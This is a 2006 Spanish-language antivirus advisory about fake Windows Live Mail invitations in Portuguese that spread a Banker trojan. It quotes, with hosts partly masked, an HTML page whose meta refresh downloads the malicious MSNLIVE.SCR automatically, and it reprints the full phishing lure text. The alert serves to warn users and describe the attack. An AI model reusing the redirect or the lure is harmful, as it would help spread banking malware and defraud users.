|
VSantivirus No. 2027 Año 10, jueves 26 de enero de 2006
Falsa invitación a Windows Live Mail propaga troyano
http://www.vsantivirus.com/phis-wlm-banker-260105.htm
Por Angela Ruiz
angela@videosoft.net.uy
Todavía en su versión beta, Windows Live Mail es la respuesta de Microsoft a los servicios de correo como Gmail y otros. Básicamente, su interfase es muy similar al Outlook. Se puede navegar por distintos mensajes sin recargar la página, y posee nuevas opciones para combatir el phishing y el spam.
Por el momento, la única forma de acceder al nuevo servicio, es por medio de invitaciones (algo similar al sistema de Google para obtener una cuenta de Gmail).
El problema es que cuando recibimos este tipo de mensajes, es muy fácil caer en una trampa como la que motiva esta alerta.
Ya se han detectado falsas invitaciones que proponen al usuario acceder al nuevo servicio de Microsoft. Pero si se hace clic en un botón que indica el enlace a una demostración del sitio, en realidad se descarga una variante de la familia de troyanos del tipo Banker (en este caso
Win32/Spy.Banker.AHY, según indica NOD32).
Aunque no es nueva esta forma de propagación (los Banker y otros similares se envían en forma de spam, falsas tarjetas de salutaciones o cualquier otro tipo de mensaje que engañe al usuario para que descargue y ejecute de Internet al troyano propiamente dicho), el peligro en este caso, está en la confianza que puede significar una invitación similar a la que podríamos recibir de un servicio legítimo (Windows Live Mail). Por supuesto, también podrían utilizarse trucos similares con otros servicios, como Gmail por ejemplo.
En el caso aquí comentado, el falso mensaje está redactado en portugués, sencillamente porque el Win32/Spy.Banker se especializa en robar cuentas bancarias y otra información crítica, relacionada generalmente con instituciones bancarias brasileras. Sin embargo, nada impide que aparezcan mensajes con ideas similares, en otros idiomas, incluido español.
Es importante que siempre tengamos en cuenta las reglas básicas para una computación segura, que en el caso del correo electrónico consisten en no hacer clic sobre enlaces de mensajes no solicitados (aún cuando parezcan legítimos como en este caso, y/o enviados por conocidos), ni tampoco abrir adjuntos.
Antes de aceptar este tipo de invitación, debemos estar muy seguros de que lo envía alguien conocido (y que realmente es esa persona quien lo hace).
Detalles técnicos del falso mensaje
En el caso del Outlook Express 6, el mensaje visualiza la imagen del botón con el enlace al troyano, solo si se tiene desactivada la opción "Leer todos los mensajes como texto sin formato" (Herramientas, Opciones, Leer). Se recomienda tener esa opción siempre tildada.
El código del mensaje está codificado en base 64. De este modo, no es visible el verdadero enlace si se examinan sus propiedades:
Content-Type: text/html
Content-Transfer-Encoding: base64
El enlace descarga el troyano Win32/Spy.Banker.AHY, en un archivo llamado MSNLIVE.SCR, de un enlace que corresponde a la Facultad de Ciencias de la Universidad de Valladolid (está activo al momento de esta alerta).
http : / /
???????????.cie.uva.es/microsoft/msnlive.scr
NOTA VSA 31/01/06: Se han recibido nuevas muestras, prácticamente similares, pero que descargan el troyano de forma automática desde diferentes sitios de Internet. Por ejemplo, uno de ellos abre una página cuyo contenido es el siguiente:
<HTML><HEAD><TITLE>MSN Live</TITLE><META NAME="Keywords" CONTENT=""><META HTTP-EQUIV="Refresh"
CONTENT="0;URL=http://www.????a.br/microsoft/msnlive.scr"><script src="http://support.sitelutions.com/sl/popunder.js" language="JavaScript1.1" type="text/javascript"></script><META NAME="Description" CONTENT=""></HEAD><BODY></BODY></HTML>
Esto hace que se descargue automáticamente el archivo MSNLIVE.SCR de un sitio en un servidor de origen brasileño. NOD32 lo detecta como Win32/Spy.Banker.AHY.
La protección contra elementos emergentes del Internet Explorer 6.0 de Windows XP SP2, también advierte la descarga de este tipo de archivo y evita su ejecución (Herramientas, Bloqueador de elementos emergentes).
Más información
Spy.Banker.AHY. Roba información de cuentas bancarias
http://www.vsantivirus.com/spy-banker-ahy.htm
Spy.Banker. Roba información de cuentas bancarias
http://www.vsantivirus.com/spy-banker.htm
Texto del mensaje (en portugués):
Você foi convidado
Como um de nossos usuários VIP de Hotmail, queremos convidá-lo a experimentar nossa próxima geração de e-mail com base na Web - o Windows Live Mail Beta. O serviço vem sendo desenvolvido e aprimorado há algum tempo para proporcionar a melhorar experiência de email da Internet , e temos certeza que você vai gostar de conhecê-lo e testá- lo em primeira mão. Entre já !
Estes são alguns recursos que vão facilitar sua experiencia com o email:
* Rápido, Rápido, Rápido. Criado com uma nova tecnología que torna a navegação pelo email muito mais rápida
* Mais simplicidade no gerenciamento da caixa de entrada. Além da visualização das mensagens em um painel de leitura, ele também inclui o recurso arrastar-e-soltar
* Mais segurança. Nova ferramenta contra lixo eletrônico e "phishing"
* Muito mais espaço. Espaço extra para suas mensagens com 2GB de armazenamento
Quer dar uma olhadinha antes de entrar? Clique aqui
Não se preocupe! Depois da mudança para o Windows Live Mail Beta, suas mensagens, seus contatos e seu calendário do Hotmail estarão lá.
Obrigado,
Equipe do Windows Live Mail Beta
------------------------------------------------------
Você recebeu esta mensagem porque é um importante Cliente do MSN Hotmail. Em caso de dúvidas sobre as políticas de privacidade, leia a Declaração de Privacidade do MSN em http://privacy.msn.com.
Valorizamos nosso relacionamento com você; contudo, se você preferir não receber mais futuras ofertas ou emails de pesquisa do MSN, clique neste link: http://privacy.msn.com/choice/default.asp
Microsoft Corporation, One Microsoft Way, Redmond, WA
98052-6399, U.S.A.
|
[Última modificación:
05/02/06 02:11 -0200]
(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
|